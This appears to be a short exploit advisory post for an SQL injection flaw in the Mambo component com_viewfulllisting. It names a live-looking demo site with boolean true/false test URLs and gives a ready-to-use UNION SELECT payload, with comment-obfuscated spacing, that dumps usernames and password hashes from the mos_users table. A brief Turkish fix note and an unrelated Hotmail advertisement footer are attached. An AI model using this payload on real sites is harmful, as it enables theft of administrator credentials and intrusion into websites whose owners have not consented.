<------------------- header data start ------------------- >
#####################################################################
# Mambo Component com_viewfulllisting SQL injection Vulnerability                                   
#####################################################################

# author         : FL0RiX

# Greez          : Deep-Power,PyskE,Ruzgarin_Oglu,CWWarning0fvirüs & All My Friends

# Name           : com_viewfulllisting

# Bug Type       : SQL Injection

# Infection      : Admin login bilgileri alınabilir.

# Demo Vuln.     :
TRUE(+)
http://www.itamos.com/index.php?option=com_viewfulllisting&listing_id=2423 and 1=1
FALSE(-)
» http://www.itamos.com/index.php?option=com_viewfulllisting&listing_id=2423 and 1=0

# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_viewfulllisting&listing_id=null/**/and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,9,concat(username,0x3,password)fl0rixf0rever,11,12/**/from/**/mos_users

< -- bug code end of -- >
 		 	   		  
_________________________________________________________________
Windows Live Hotmail: Arkadaşlarınız Facebook'taki güncellemelerinizi doğrudan Hotmail®'den alır.
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009